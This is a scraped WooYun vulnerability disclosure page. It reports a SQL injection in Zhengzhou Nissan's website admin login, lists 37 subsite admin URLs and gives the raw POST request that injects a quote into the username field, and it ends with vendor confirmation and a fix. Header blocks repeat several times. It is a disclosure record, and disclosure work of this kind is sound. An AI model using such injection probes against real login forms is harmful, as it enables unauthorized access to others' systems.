郑州日产汽车有限公司省级网站管理系统SQL注入漏洞37个分站使用该系统

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0165130

漏洞标题：郑州日产汽车有限公司省级网站管理系统SQL注入漏洞37个分站使用该系统

漏洞作者：岛云首席鉴黄师

提交时间：2015-12-28 12:44

修复时间：2016-01-14 11:29

公开时间：2016-01-14 11:29

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-28：细节已通知厂商并且等待厂商处理中
2015-12-31：厂商已经确认，细节仅向厂商公开
2016-01-10：细节向核心白帽子及相关领域专家公开
2016-01-14：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

……

详细说明：

后台登录框POST注入，共37个分钟使用该系统。

http://beijing.zznissan.com.cn/admin/console/?c=login&a=log
http://anhui.zznissan.com.cn/admin/console/?c=login&a=log
http://chongqing.zznissan.com.cn/admin/console/?c=login&a=log
http://civilian.zznissan.com.cn/admin/console/?c=login&a=log
http://e.zznissan.com.cn/admin/console/?c=login&a=log
http://fujian.zznissan.com.cn/admin/console/?c=login&a=log
http://gansu.zznissan.com.cn/admin/console/?c=login&a=log
http://guangdong.zznissan.com.cn/admin/console/?c=login&a=log
http://guangxi.zznissan.com.cn/admin/console/?c=login&a=log
http://guangzhou.zznissan.com.cn/admin/console/?c=login&a=log
http://guizhou.zznissan.com.cn/admin/console/?c=login&a=log
http://hainan.zznissan.com.cn/admin/console/?c=login&a=log
http://hebei.zznissan.com.cn/admin/console/?c=login&a=log
http://heilongjiang.zznissan.com.cn/admin/console/?c=login&a=log
http://henan.zznissan.com.cn/admin/console/?c=login&a=log
http://hubei.zznissan.com.cn/admin/console/?c=login&a=log
http://hunan.zznissan.com.cn/admin/console/?c=login&a=log
http://jiangsu.zznissan.com.cn/admin/console/?c=login&a=log
http://jiangxi.zznissan.com.cn/admin/console/?c=login&a=log
http://jilin.zznissan.com.cn/admin/console/?c=login&a=log
http://liaoning.zznissan.com.cn/admin/console/?c=login&a=log
http://neimenggu.zznissan.com.cn/admin/console/?c=login&a=log
http://ningxia.zznissan.com.cn/admin/console/?c=login&a=log
http://nv200.zznissan.com.cn/admin/console/?c=login&a=log
http://patrol.zznissan.com.cn/admin/console/?c=login&a=log
http://qinghai.zznissan.com.cn/admin/console/?c=login&a=log
http://shandong.zznissan.com.cn/admin/console/?c=login&a=log
http://shanghai.zznissan.com.cn/admin/console/?c=login&a=log
http://shanxi.zznissan.com.cn/admin/console/?c=login&a=log
http://sichuan.zznissan.com.cn/admin/console/?c=login&a=log
http://spv.zznissan.com.cn/admin/console/?c=login&a=log
http://sx.zznissan.com.cn/admin/console/?c=login&a=log
http://tianjin.zznissan.com.cn/admin/console/?c=login&a=log
http://zhejiang.zznissan.com.cn/admin/console/?c=login&a=log
http://yunnan.zznissan.com.cn/admin/console/?c=login&a=log
http://xizang.zznissan.com.cn/admin/console/?c=login&a=log
http://xinjiang.zznissan.com.cn/admin/console/?c=login&a=log

POST数据：

POST /admin/console/?c=login HTTP/1.1
Host: fujian.zznissan.com.cn
Content-Length: 75
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://fujian.zznissan.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://fujian.zznissan.com.cn/admin/console/?c=login&a=log
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: XYRE_SID=a6c39677a50f5f66aff40c1f9b418252f1dcab57; PHPSESSID=6fdrf9jc327vdev1r63uid85i7
username=%27&password=&captcha=cjfa&imageField.x=64&imageField.y=19&a=login

注入参数：username

漏洞证明：

如上

修复方案：

过滤

版权声明：转载请注明来源岛云首席鉴黄师@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-12-31 14:03

厂商回复：

已确认，谢谢！

漏洞评价：

评价

2015-12-31 14:17 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:460 漏洞数:125 | icisaw.cn 超低价虚拟主机VPS 购买返现支...)

@郑州日产汽车有限公司侧重的问一下，发现漏洞买车给优惠么？
2016-01-14 10:21 | 郑州日产汽车有限公司(乌云厂商)

@岛云首席鉴黄师现在市场上的优惠大礼包，几乎等于员工内部购车优惠啦。年底嘛，车厂都在冲量。
2016-01-14 10:22 | 郑州日产汽车有限公司(乌云厂商)

@岛云首席鉴黄师兄如果有时间，可否再测试一下？开发修改过代码后，我这里不能复现这个post注入了。
2016-01-14 11:19 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:460 漏洞数:125 | icisaw.cn 超低价虚拟主机VPS 购买返现支...)

@郑州日产汽车有限公司没有了~哈哈
2016-01-14 11:29 | 郑州日产汽车有限公司(乌云厂商)

@岛云首席鉴黄师非常感谢！
2016-01-14 12:32 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:460 漏洞数:125 | icisaw.cn 超低价虚拟主机VPS 购买返现支...)

@郑州日产汽车有限公司客气了~

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0165130

漏洞标题：郑州日产汽车有限公司省级网站管理系统SQL注入漏洞37个分站使用该系统

相关厂商：郑州日产汽车有限公司

漏洞作者：岛云首席鉴黄师

提交时间：2015-12-28 12:44

修复时间：2016-01-14 11:29

公开时间：2016-01-14 11:29

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源岛云首席鉴黄师@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0165130

漏洞标题：郑州日产汽车有限公司省级网站管理系统SQL注入漏洞37个分站使用该系统

相关厂商：郑州日产汽车有限公司

漏洞作者： 岛云首席鉴黄师

提交时间：2015-12-28 12:44

修复时间：2016-01-14 11:29

公开时间：2016-01-14 11:29

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0165130"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 岛云首席鉴黄师@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：岛云首席鉴黄师

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源岛云首席鉴黄师@乌云